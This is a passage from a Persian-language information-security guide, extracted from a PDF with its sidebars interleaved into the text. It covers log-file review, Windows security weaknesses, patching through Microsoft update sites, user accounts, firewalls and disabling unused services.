‫ﺑﺮﺭﺳﻲ ﻭ ﻳﻚ ﻭﻳﺮﻭﺱ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩ‪.‬‬
‫ﺑﺴﺘﻪ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣـﻲﺷـﻮﺩ‪،‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻌﺪ ﺍﺯ ﺯﻳﺎﺩ ﺷـﺪﻥ ﺣﺠﻤـﺸﺎﻥ ﭘـﺎﻙ‬
‫ﺷﻮﻧﺪ‪ ،‬ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﻓﺎﻳﻞ ﺛﺒﺖ ﺟﺪﻳـﺪﻱ ﺍﻳﺠـﺎﺩ‬
‫ﮔﺮﺩﺩ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺑـﺮﺍﻱ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﺑﻌـﺪﻱ ﻫﻤﭽﻨـﺎﻥ‬
‫ﺣﻔﻆ ﺷﻮﻧﺪ )ﻋﻤﺪﺗﹰﺎ ﺩﺭ ﻗﺴﻤﺘﻲ ﺍﺯ ﻧﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻳـﻚ ﺗـﺎﺭﻳﺦ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ(‪.‬‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺮﺍﻱ ﻫﺮ ﺳﻴﺴﺘﻢ ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﻳـﻚ ﻓﺎﻳـﻞ‬
‫ﺛﺒﺖ ﻣﺠﺰﺍ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳـﻦ ﻓﺎﻳـﻞ ﺭﺍ ﺑـﺎ‬
‫ﻳﻚ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣـﺘﻦ ﺑﺨﻮﺍﻧﻴـﺪ ﻭ ﮔـﺎﻫﻲ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻭ‬
‫ﻗﺎﻟﺐﺑﻨﺪﻱ ﻓﺎﻳﻠﻬﺎ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﺛﺒﺘﻬﺎ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ﻭ ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺎﻳﺪ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﻋﻴﻦ‬
‫ﺣﺎﻝ ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻭ‬
‫ﻋﺎﺩﻱ ﻓﻌﺎﻝ ﻧﻜﻨﻴﺪ؛ ﺯﻳﺮﺍ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﻭﻗﺖ ﺯﻳﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ‬
‫ﺛﺒﺖ ﻭ ﺑﺮﺭﺳﻲ ﺁﻧﻬﺎ ﺻﺮﻑ ﻛﻨﺪ ﻭ ﺣﺠﻤﻲ ﺍﺯ ﺩﻳﺴﻚ ﻧﻴﺰ ﺗﻮﺳـﻂ‬
‫ﺁﻧﻬﺎ ﺍﺷﻐﺎﻝ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﮔﺮ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﻗﻼﻡ ﻣـﺸﺮﻭﺡ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﭼـﻪ ﭼﻴﺰﻫـﺎﻳﻲ ﺭﺍ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﺩﻭﺭﻩﺍﻱ ﻣﺮﻭﺭ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺒﻴﻨﻴـﺪ‬
‫ﺁﻳﺎ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋﺎﺩﻱ ﺭﺥ ﺩﺍﺩﻩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺛﺒﺘﻬﺎ ﺑﺎﻳﺪ‬
‫ﺑﮕﻮﻧــﻪﺍﻱ ﻧﮕﻬــﺪﺍﺭﻱ ﺷــﻮﻧﺪ ﻛــﻪ ﺩﺭﺻــﻮﺭﺕ ﻭﻗــﻮﻉ ﺍﺗﻔﺎﻗــﺎﺕ‬
‫ﻏﻴﺮﻃﺒﻴﻌﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺸﻒ ﺩﻗﻴﻘﺘﺮ ﺁﻧﭽـﻪ ﻛـﻪ‬
‫ﺭﺥ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪٩٩‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻓﺼﻞ ﻫﺸﺘﻢ‬
‫ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ‬
‫ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Windows‬ﭘﺮﺩﺍﺯﻧـﺪﺓ ‪) Intel x86‬ﻳـﺎ ﻣﻌﺎﺩﻟﻬـﺎﻱ‬
‫ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ‬
‫ﺁﻥ( ﺭﺍﻳﺠﺘﺮﻳﻦ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪ .‬ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺁﻥ‬
‫ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻳﻚ ﻛـﺎﺭﺑﺮ ﺑـﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﻫـﺴﺘﻨﺪ ﻭ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ‪ shareware‬ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍﻳﮕـﺎﻥ‬
‫ﺑﺮﺍﻱ ﺁﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ﻣﺸﺎﺑﻪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺠﺎ‬
‫ﻫﻢ ﺍﻓﺮﺍﺩ ﻣﺘﺨﺼﺺ ﺑﻪ ﺳﺨﺘﻲ ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻣـﺎ ﻣﺘﺨﺼـﺼﻴﻦ‬
‫ﺯﻳﺎﺩﻱ ﺑﺎ ﺳﻄﺢ ﺩﺍﻧﺶ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑـﺎ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺭﻗﺒﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺑﻌﺪ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺑـﺎ ﻫـﻢ‬
‫ﺭﻗﺎﺑﺖ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺧـﻮﺩ ﺑﺎﻋـﺚ ﺗﻨـﻮﻉ ﻣﺤـﺼﻮﻻﺕ ﻭ‬
‫ﻗﻴﻤﺘﻬﺎﻱ ﻧﺴﺒﺘﹰﺎ ﭘﺎﻳﻴﻦ ﺁﻧﻬﺎ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻗﺎﺑﻞ‬
‫ﺍﻋﻤﺎﻝ ﺍﺳﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﮕﺮﺍﻥ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻫـﺴﺘﻨﺪ ﺑﺎﻳـﺪ‬
‫ﺗﻤﺎﻡ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫‪ Windows‬ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘـﻲ ﻭﺿـﻌﻴﺖ ﭼﻨـﺪﺍﻥ ﺟـﺎﻟﺒﻲ ﻧـﺪﺍﺭﺩ‪.‬‬
‫ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ١١٧‬ﺑﺎ ﻣﻼﺣﻈـﺔ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﺑﻮﺩ ﻭ ﻫﺮﭼﻨﺪ ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺁﻥ‬
‫)‪ Windows 2000‬ﻭ ‪ Windows XP‬ﻭ‪ (...‬ﺑﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‬
‫ﭘﺮﺩﺍﺧﺘﻪ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﻫﻨﻮﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﻴﺮ‬
‫ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗـﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﺮﺩﻧـﺪ‬
‫ﻛﻤﻚ ﺍﻧﺪﻛﻲ ﻧﻤﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺗﻮﺟـﻪ‬
‫ﺯﻳﺎﺩﻱ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻧﺪﺍﺷﺖ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺷـﺮﺍﻳﻂ‬
‫ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧـﺪ‪ ،‬ﺑـﻮﻳﮋﻩ ﺁﻧﻜـﻪ ﺍﻳـﻦ ﺷـﺮﻛﺖ ﺗﻮﺟـﻪ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ‬
‫ﺍﺷــﻜﺎﻻﺕ ﻣﻮﺟــﻮﺩ ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﭼﻨﺪﺭﺳــﺎﻧﻪﺍﻱ ﻭ ﺩﻳﮕــﺮ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺧﻮﺩ ﻣﻌﻄﻮﻑ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﻻ ﺑﺎﻋﺚ ﺑـﺎﻻ‬
‫ﻋﻤﻠﻜﺮﺩ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﺔ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﻓﺘﻦ ﻫﺰﻳﻨﺔ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺑﻤﻨﻈﻮﺭ‬
‫ﺁﺳﺎﻥ ﻛﺮﺩﻥ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﺍﺯ ﺍﺑﺰﺍﺭ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ‬
‫‪117 O.S. Kernel‬‬
‫ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﺍﮔﺮ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﺎﻓﻲ ﺩﺍﺭﻳـﺪ‪ ،‬ﺑـﺮﺍﻱ ﺑـﻪﺭﻭﺯ ﻧﮕـﻪﺩﺍﺷـﺘﻦ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﺎ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ‪ServicePack‬ﻫـﺎ‬
‫ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ١١٨‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ‬
‫ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻭﺻــﻠﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻣﻨﺘــﺸﺮﺷﺪﻩ ﺑــﺮﺍﻱ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ‪ Windows‬ﺭﺍ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ )ﺍﻳـﻦ ﻭﺻـﻠﻪﻫـﺎ‬
‫ﻧﺴﺒﺖ ﺑﻪ ‪Service Pack‬ﻫﺎ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﻤﺘﺮﻱ ﺍﺷﻐﺎﻝ ﻣﻲﻛﻨﻨﺪ(‪.‬‬
‫ﺍﮔــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺍﺯ ﻃﺮﻳــﻖ ﭘﺎﻳﮕــﺎﻩ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ‬
‫ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺑﺮﺍﻳﺘــﺎﻥ ﺍﻣﻜﺎﻧﭙــﺬﻳﺮ ﻧﻴــﺴﺖ ﻣــﻲﺗﻮﺍﻧﻴــﺪ‬
‫ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ ﺍﺯ ﻣﺮﻛــﺰ ‪download‬‬
‫ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ١١٩‬ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪.‬‬
‫ﺷﺎﻳﺪ ‪ ISP‬ﺷﻤﺎ ﻳﺎ ﺳﺎﻳﺮ ﻓﺮﺍﻫﻢﺁﻭﺭﻧﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺘﻮﺍﻧﻨـﺪ‬
‫ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ ﻣﻨﺘـﺸﺮﺷﺪﻩ ﺭﺍ ‪ download‬ﻭ ﺭﻭﻱ‬
‫ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺗﻮﺯﻳﻊ ﻛﻨﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻣﻨـﺎﺑﻊ ﻗﺎﺑـﻞﺗـﻮﺟﻬﻲ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ‪ Windows‬ﺩﺭ ﻗﺎﻟـﺐ ﺧـﺪﻣﺎﺗﻲ ﺑـﻪ ﻧـﺎﻡ‬
‫‪ Software Update Services‬ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
‫‪ Windows 2000‬ﺩﺭ ﭘﺎﻳﮕــﺎﻩ ﺯﻳــﺮ ﻗﺎﺑــﻞ ﺩﺳﺘﺮﺳــﻲ‬
‫ﺍﺳﺖ‪:‬‬
‫‪118 http://windowsupdate.microsoft.com‬‬
‫‪119 http://www.microsoft.com/downloads‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ‪Windows‬‬
‫ﭼﻨﺪﻳﻦ ﺯﻳﺮﺳﻴﺴﺘﻢ ﻭ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﻛﺜﺮﺕ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﻧﻴﺰ ﺗﻌﺪﺩ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫‪ Windows‬ﺑﻪ ﺍﻫﺪﺍﻑ ﺍﺻﻠﻲ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﺎﻧﻲ ﻛﻪ ﺑـﺪﺍﻓﺰﺍﺭﻫﺎﻳﻲ‬
‫ﻣﺜﻞ ﻭﻳﺮﻭﺱ‪ ،‬ﻛﺮﻡ ﻭ ﺗـﺮﻭﺍ ﻣﻨﺘـﺸﺮ ﻣـﻲﻛﺮﺩﻧـﺪ ﺗﺒـﺪﻳﻞ ﺷـﺪﻧﺪ‪.‬‬
‫ﻭﺍﺳﻄﻬﺎﻱ ﮔﺮﺍﻓﻴﻜﻲ ﻛـﺎﺭﺑﺮ ﺩﺭ ‪ Windows‬ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺑﺮﭘـﺴﻨﺪ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻫﻢﺍﻛﻨﻮﻥ ﻣﻴﻠﻴﻮﻧﻬﺎ ﻧﻔﺮ ﺑﺎ ﺩﺍﻧﺶ ﻓﻨـﻲ ﺍﻧـﺪﻙ ﺗﻮﺍﻧـﺎﻳﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﻛـﺎﺭﺑﺮ ﻭﻗﺘـﻲ ﺩﺭ‬
‫ﻛﻨﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ‬
‫ﺑﺮ ‪ Windows‬ﺭﺍ ﻣﺴﺘﻌﺪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪١٠٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪http://www.microsoft.com/windows2000‬‬
‫‪/windowsupdate/sus/‬‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪Windows 2000 ،Windows NT‬‬
‫ﻭ ‪XP‬‬
‫‪ Windows‬ﻛــﻪ ﺍﺯ ﻗﺎﺑﻠﻴــﺖ ﭼﻨــﺪﻛﺎﺭﺑﺮﻱ‬
‫‪١٢٠‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ ﻫـﻴﭻ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻏﻴﺮ ﺿﺮﻭﺭﻱ ﺩﺭ ﺁﻧﻬﺎ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻚ ﺭﻣﺰ‬
‫ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ‪ -‬ﺑﺮ ﺍﺳﺎﺱ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﺳﻮﻡ ﻫﻤﻴﻦ‬
‫ﺑﺨﺶ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ ‪ -‬ﺑﺮﺍﻱ ﺧـﻮﺩ ﺑﺮﮔﺰﻳـﺪﻩ ﺍﻧـﺪ‪ .‬ﺑـﻪ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺍﻣﺘﻴﺎﺯﺍﺗﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺁﻧﻬﺎ ﺍﺳـﺖ ﺩﺍﺩﻩ‬
‫ﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺣﺘﻲ ﺍﮔﺮ ﺗﻨﻬﺎ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﺗﻮﺳـﻂ‬
‫ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﺧﻮﺩ ﺭﺍﻫﺒﺮﻱ ﺷﻮﺩ‪ ،‬ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ‬
‫ﺭﻭﺯﻣﺮﻩ ﻭ ﻣﻌﻤﻮﻟﻲ ﺧﻮﺩ ﻧﺒﺎﻳﺪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ‪.‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‬
‫ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ‬
‫‪١٢٢‬‬
‫ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻤـﺎﻣﻲ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺷـﺒﻜﻪ ﻓﻌـﺎﻝ‬
‫ﻫﺴﺘﻨﺪ ﺗﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺘﻮﺍﻧﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺑﺮﻗـﺮﺍﺭ‬
‫ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺩﺭ ﺷﺮﻛﺖ ﺧـﻮﺩ ﺷـﺒﻜﻪ ﻧﺪﺍﺭﻳـﺪ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ‬
‫ﻛﺎﺭﺑﺮﺩ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺭﻭﻱ‬
‫ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﻧـﺼﺐ ﻛﻨﻴـﺪ‪ .‬ﻧـﺴﺨﻪﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﺍﻳـﻦ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺭﺍ ﺑـﻪﺭﻭﺯ‬
‫ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺑﮕﻮﻧـﻪ ﺍﻱ‬
‫ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻫﺮ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋـﺎﺩﻱ ﺑـﻪ‬
‫ﺷﻤﺎ ﻫﺸﺪﺍﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺿﺪﻭﻳﺮﻭﺱ‬
‫ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻳﺎ ﺍﺷﺘﺮﺍﻙ ﺧﺪﻣﺎﺕ ﭼﺎﭖ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻏﻴﺮﻓﻌـﺎﻝ ﺷـﺪﻩﺍﻧـﺪ‪.‬‬
‫ﻣﺮﺍﺣﻞ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ‪ Windows Help‬ﻭ ﭘﺎﻳﮕـﺎﻩ‬
‫ﺍﻃﻼﻉﺭﺳـﺎﻧﻲ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻗﺎﺑـﻞ ﺩﺳـﺘﺮﺱ‬
